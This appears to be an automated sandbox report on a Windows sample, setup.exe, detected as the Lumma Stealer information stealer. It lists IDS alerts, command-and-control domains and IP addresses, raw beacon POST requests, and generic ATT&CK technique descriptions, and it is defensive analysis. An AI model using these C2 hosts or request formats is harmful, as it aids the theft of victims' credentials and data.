Source: Network traffic	Suricata IDS: 2055294 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) : 192.168.2.5:49707 -> 172.67.186.145:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49710 -> 172.67.186.145:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 172.67.186.145:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.186.145:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.186.145:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.42.119:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.42.119:443

Source: Joe Sandbox View	IP Address: 172.67.186.145 172.67.186.145
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.21.42.119 104.21.42.119

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: largerryskwhq.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: interactiedovspm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: charecteristicdxp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=l3aD5kQNFAFJ0us2znHMtBViGKtZ6731N4ENSaRLwLI-1724836330-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: charecteristicdxp.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: largerryskwhq.shop
Source: global traffic	DNS traffic detected: DNS query: potentioallykeos.shop
Source: global traffic	DNS traffic detected: DNS query: interactiedovspm.shop
Source: global traffic	DNS traffic detected: DNS query: charecteristicdxp.shop

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
setup.exe

Function 0040AE60 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 562
libraryCOMMON

Function 00434480 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0040C1F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 169
COMMON

Function 0042BA80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32
COMMON

Function 00409CD0 Relevance: 4.7, APIs: 3, Instructions: 209
COMMON

Function 00433A90 Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Function 00432760 Relevance: 1.6, APIs: 1, Instructions: 74
memoryCOMMON

Function 00432752 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON